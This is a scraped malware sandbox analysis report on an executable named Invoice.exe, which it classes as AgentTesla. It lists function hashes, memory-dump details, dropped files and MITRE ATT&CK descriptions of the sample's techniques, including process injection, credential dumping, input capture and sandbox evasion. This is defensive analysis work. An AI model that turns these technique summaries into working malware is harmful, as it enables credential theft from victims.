Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44bbd4267eb47609fab0099928bbed3423def89bab42e76bd5be70f39ec19b8e
Instruction ID: e083889bd1cd2057b1807863d0e57f0980094ac9560b7d16efc15341f57f9dda
Opcode Fuzzy Hash: 44bbd4267eb47609fab0099928bbed3423def89bab42e76bd5be70f39ec19b8e
Instruction Fuzzy Hash: C2D05E72A0120CEBDB04CEEAC9006EEB7FEDB84201F10C0AAA408D3140E5355F40A661

Uniqueness

Uniqueness Score: -1.00%

Function 04A9AE40 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0413f6e1dd4b3d8c47d51f3a728649d52cabd29b25aa82918bf66be5cc7857d1
Instruction ID: 704e9d70ed8d4904495598b0476cd7a47087a47769e58a9178ef90c3a4314872
Opcode Fuzzy Hash: 0413f6e1dd4b3d8c47d51f3a728649d52cabd29b25aa82918bf66be5cc7857d1
Instruction Fuzzy Hash: CED0123435465B8BDF145BE9B495B7577EE9F40B05B04407AE40EC1500EB1AFC42A551

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04A909D0 Relevance: 41.7, Strings: 33, Instructions: 441COMMON

Download Yara Rule

Strings

4'fq, xrefs: 04A90B3E
4'fq, xrefs: 04A90F87
4'fq, xrefs: 04A90CE2
4'fq, xrefs: 04A90BCA
4'fq, xrefs: 04A90D28
4'fq, xrefs: 04A90BA7
4'fq, xrefs: 04A90BED
4'fq, xrefs: 04A90AB2
4'fq, xrefs: 04A90B1B
4'fq, xrefs: 04A90D77
4'fq, xrefs: 04A90C56
4'fq, xrefs: 04A90DA3
4'fq, xrefs: 04A90F03
4'fq, xrefs: 04A90D05
4'fq, xrefs: 04A90DCF
4'fq, xrefs: 04A90F2F
4'fq, xrefs: 04A90EAB
4'fq, xrefs: 04A90E27
4'fq, xrefs: 04A90C33
4'fq, xrefs: 04A90ED7
4'fq, xrefs: 04A90C9C
4'fq, xrefs: 04A90E7F
4'fq, xrefs: 04A90AD5
4'fq, xrefs: 04A90B61
4'fq, xrefs: 04A90C10
4'fq, xrefs: 04A90CBF
4'fq, xrefs: 04A90DFB
4'fq, xrefs: 04A90F5B
4'fq, xrefs: 04A90C79
4'fq, xrefs: 04A90B84
4'fq, xrefs: 04A90AF8
4'fq, xrefs: 04A90D4B
4'fq, xrefs: 04A90E53

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
API String ID: 0-3006135790
Opcode ID: 6d809ad3c0e7129d2b385fe8152b94b35eaff244c87964d610098300d48f5d2b
Instruction ID: 04e3a331d60197eecbfd3ea40856f571149267947ee0bf799d4df71a7f544a74
Opcode Fuzzy Hash: 6d809ad3c0e7129d2b385fe8152b94b35eaff244c87964d610098300d48f5d2b
Instruction Fuzzy Hash: FF12DF70A01205CFCB48EF75E995AAE7BB2FB40300F208599D009AB366EF356D45DF95

Uniqueness

Uniqueness Score: -1.00%

Function 04A909E0 Relevance: 41.7, Strings: 33, Instructions: 434COMMON

Download Yara Rule

Strings

4'fq, xrefs: 04A90B3E
4'fq, xrefs: 04A90F87
4'fq, xrefs: 04A90CE2
4'fq, xrefs: 04A90BCA
4'fq, xrefs: 04A90D28
4'fq, xrefs: 04A90BA7
4'fq, xrefs: 04A90BED
4'fq, xrefs: 04A90AB2
4'fq, xrefs: 04A90B1B
4'fq, xrefs: 04A90D77
4'fq, xrefs: 04A90C56
4'fq, xrefs: 04A90DA3
4'fq, xrefs: 04A90F03
4'fq, xrefs: 04A90D05
4'fq, xrefs: 04A90DCF
4'fq, xrefs: 04A90F2F
4'fq, xrefs: 04A90EAB
4'fq, xrefs: 04A90E27
4'fq, xrefs: 04A90C33
4'fq, xrefs: 04A90ED7
4'fq, xrefs: 04A90C9C
4'fq, xrefs: 04A90E7F
4'fq, xrefs: 04A90AD5
4'fq, xrefs: 04A90B61
4'fq, xrefs: 04A90C10
4'fq, xrefs: 04A90CBF
4'fq, xrefs: 04A90DFB
4'fq, xrefs: 04A90F5B
4'fq, xrefs: 04A90C79
4'fq, xrefs: 04A90B84
4'fq, xrefs: 04A90AF8
4'fq, xrefs: 04A90D4B
4'fq, xrefs: 04A90E53

Memory Dump Source

Source File: 00000010.00000002.1858752675.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4a90000_BjTxJte.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
API String ID: 0-3006135790
Opcode ID: 01416b52d7ad6c5cdc411b9454f314b36f0bfc95d75312b62253b2e32bd2015a
Instruction ID: eedd99f375ff824e54026027f9dff60d1eb19a9459984ca6f7bd6e89b5b059b2
Opcode Fuzzy Hash: 01416b52d7ad6c5cdc411b9454f314b36f0bfc95d75312b62253b2e32bd2015a
Instruction Fuzzy Hash: E212DF70A01209CFCB48EF75E995AAE7BB2FB40300F208569D009AB366EF356D45DF95

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: BjTxJte.exePID: 8148, Parent PID: 7948COMMON

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	11
Total number of Limit Nodes:	2

Executed Functions

Function 06866618 Relevance: .8, Instructions: 816COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1953408013.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6860000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73da4dd438bbfcab395b71c398f81de69d2f716ae8df3f0b65f0cd5f58cb95b6
Instruction ID: 8d4f028585af7b7442a081605a66400432ba355128f39661e959404305040da1
Opcode Fuzzy Hash: 73da4dd438bbfcab395b71c398f81de69d2f716ae8df3f0b65f0cd5f58cb95b6
Instruction Fuzzy Hash: E462AD34B002448FDB64DB69D590BADB7F2EF84304F148469E906EB395EB35EC81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EBEFCB Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 00EBF037

Memory Dump Source

Source File: 00000014.00000002.1936141756.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_eb0000_BjTxJte.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 804397449acb79fbf6ec97ca36083096cd0e9417c2f2b0ba3e24c4a663b557cc
Instruction ID: 5df0bb8b80dccf4e993e62ce3d15bd4491bc093bbad784cb68600bde9a4e97ea
Opcode Fuzzy Hash: 804397449acb79fbf6ec97ca36083096cd0e9417c2f2b0ba3e24c4a663b557cc
Instruction Fuzzy Hash: 481112B1C0065A9BDB10DF9AC945BDEFBF4EF48320F14816AE818B7250D378A941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EBEFD0 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 00EBF037

Memory Dump Source

Source File: 00000014.00000002.1936141756.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_eb0000_BjTxJte.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: f7104a004fc977ee8d5a426468844ccae5297b5fa8247b1ac23b664529c69311
Instruction ID: 6f5b8ff88ed2f3d9de8728686015bceb42b647bd524381eb359cabc5b4fac62f
Opcode Fuzzy Hash: f7104a004fc977ee8d5a426468844ccae5297b5fa8247b1ac23b664529c69311
Instruction Fuzzy Hash: B71114B1C002599BDB10DF9AC545BDEFBF4AF48320F14816AD418B7250D378A940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0686DAF8 Relevance: 1.4, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHfq, xrefs: 0686DC41

Memory Dump Source

Source File: 00000014.00000002.1953408013.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6860000_BjTxJte.jbxd

Similarity

API ID:
String ID: PHfq
API String ID: 0-2154135885
Opcode ID: 097df773a38625c30cb0cc4c8895cd35f7d2b3338973d316914c7c6cf17f3506
Instruction ID: e8138e7c94de3a0578553d570aabc0b183ab7e540af0abc4231ab3bb8e9ee210
Opcode Fuzzy Hash: 097df773a38625c30cb0cc4c8895cd35f7d2b3338973d316914c7c6cf17f3506
Instruction Fuzzy Hash: 23418E70F00209DFDB65DF66D89579EBBB2BF85300F208929E506EB344DB709846CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0686DAE5 Relevance: 1.4, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHfq, xrefs: 0686DC41

Memory Dump Source

Source File: 00000014.00000002.1953408013.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6860000_BjTxJte.jbxd

Similarity

API ID:
String ID: PHfq
API String ID: 0-2154135885
Opcode ID: 783e15946070af8a2981f9a495a891a231bee4587e0c03d560b990c7d858d428
Instruction ID: 471410be2d8ca3a9ce140c9f85ce8f1d509995cd98901b12b4e86ad13cfb02e9
Opcode Fuzzy Hash: 783e15946070af8a2981f9a495a891a231bee4587e0c03d560b990c7d858d428
Instruction Fuzzy Hash: 5F419F70F10209CFDB65DF66D98569EBBB2FF86300F148929E505E7384DB709846CB81

Uniqueness

Uniqueness Score: -1.00%

Function 068682E7 Relevance: 1.3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

Strings

$fq, xrefs: 0686830C

Memory Dump Source

Source File: 00000014.00000002.1953408013.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6860000_BjTxJte.jbxd

Similarity

API ID:
String ID: $fq
API String ID: 0-12477121
Opcode ID: bb6b974d189cc1daa614eabfcd807291fd5e15789b9763f197bd84a14c4061c2
Instruction ID: 672dace336edd66cab873d9bdbe115cfa21fe0c82542d8ccd07d2b940ed65a49
Opcode Fuzzy Hash: bb6b974d189cc1daa614eabfcd807291fd5e15789b9763f197bd84a14c4061c2
Instruction Fuzzy Hash: 80F08CB1E24208CFDF758E46EB426ADB7B0EB44358F588066FA09E7150D3309E42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 06864A89 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

\Okq, xrefs: 06864A95

Memory Dump Source

Source File: 00000014.00000002.1953408013.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6860000_BjTxJte.jbxd

Similarity

API ID:
String ID: \Okq
API String ID: 0-2052216381
Opcode ID: a171b3cf1ed2de3d35dad252f1447b4539d7ecbefbe56784eccc95b56c043ea7
Instruction ID: 2868c910a4cb278419ff605d590f94707bb3351884054962a732765c0c5fe5b8
Opcode Fuzzy Hash: a171b3cf1ed2de3d35dad252f1447b4539d7ecbefbe56784eccc95b56c043ea7
Instruction Fuzzy Hash: 9FF0B730A1011AEBDB24DF95E8597AEBBB2FF84701F204529F502F7294CBB41C45CB80

Uniqueness

Uniqueness Score: -1.00%

Function 06866218 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1953408013.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6860000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9143c6b9c9cb2e67401d2d87371205010d271391e0146f9673b8c5d781774211
Instruction ID: 3884b8a152d69fca108be344b18a045bdb4e929ee452af20311e5da4506f6080
Opcode Fuzzy Hash: 9143c6b9c9cb2e67401d2d87371205010d271391e0146f9673b8c5d781774211
Instruction Fuzzy Hash: AB61A471F005624FCF559A6ECC8066FAAD7AFC4210B154439E90EDB364EE66ED4287C2

Uniqueness

Uniqueness Score: -1.00%

Function 068642D8 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1953408013.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6860000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a642326757a3cb5051b5097aab1fbdf77b7aefd908140d23cf9f04b14fd2f74
Instruction ID: 539999f3b927bd4e0e23c526ea4fc9094ffaa173754c0cd508611ec9f82e742a
Opcode Fuzzy Hash: 9a642326757a3cb5051b5097aab1fbdf77b7aefd908140d23cf9f04b14fd2f74
Instruction Fuzzy Hash: A8814C30B102098FDF54DFA9D65476EB7F2AB89300F148929E50AEB398EF34DC468B51

Uniqueness

Uniqueness Score: -1.00%

Function 068642E8 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1953408013.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6860000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8af611237b945216b5ec0fe910be4262653ba111708fdb25095998e39a6869c5
Instruction ID: 42a7cc85387ac98f0dc5a2f9f934bbfdf255dab82c30a65e55d5968577330430
Opcode Fuzzy Hash: 8af611237b945216b5ec0fe910be4262653ba111708fdb25095998e39a6869c5
Instruction Fuzzy Hash: C1812C30B102098BDF54DFA9D55475EB7F2AF89300F148829E90AEB398EF74DC468B91

Uniqueness

Uniqueness Score: -1.00%

Function 06864608 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1953408013.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6860000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4a736fe3735f2e56f7ac8dc55f348fee5658151eef1a92cb2607eb85fd0cbe0
Instruction ID: b91c9d1b47188aaab8e2f1d3b7826c489a8fb051398d4f9e76dc599e77170e90
Opcode Fuzzy Hash: e4a736fe3735f2e56f7ac8dc55f348fee5658151eef1a92cb2607eb85fd0cbe0
Instruction Fuzzy Hash: 67913A74E006198BDF60DF69C890B9DB7B1FF89300F20C599E549FB295DB70AA858F90

Uniqueness

Uniqueness Score: -1.00%

Function 06863EE1 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1953408013.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6860000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe8e700a8999086b9de010dff39f7cd700176edc67d9b01ec02a7f08a56174ce
Instruction ID: 96337a0e5248757059675185ee900379d44d5a89aa2ad0351c4d80272d266076
Opcode Fuzzy Hash: fe8e700a8999086b9de010dff39f7cd700176edc67d9b01ec02a7f08a56174ce
Instruction Fuzzy Hash: C6217A75F102159FDB61DF69DA81AAEBBF1AB88300F14842AF905E7394EB34DD018B90

Uniqueness

Uniqueness Score: -1.00%

Function 06863EF0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1953408013.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6860000_BjTxJte.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10af3d0018c9018cc0fd6135d8627b8e7d7b4e2e7f3fdab2098bb7401da631da
Instruction ID: 73e9272a750649e76b9e4bd8e5904b7dd64f7f6de169dff6949deccd09910506
Opcode Fuzzy Hash: 10af3d0018c9018cc0fd6135d8627b8e7d7b4e2e7f3fdab2098bb7401da631da
Instruction Fuzzy Hash: 9C218E75F102159FDB50DF69D940AAEBBF1EB48310F148026F905E7354EB75DD008B90

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Invoice.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BjTxJte.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kaJNzBnxbXm.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3f4u3wtl.2iq.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ujf41ed.ikw.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4nyqbqhq.1dt.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gzf5tqoi.mb3.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hetoucjq.2s4.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_myghffyz.5ex.psm1

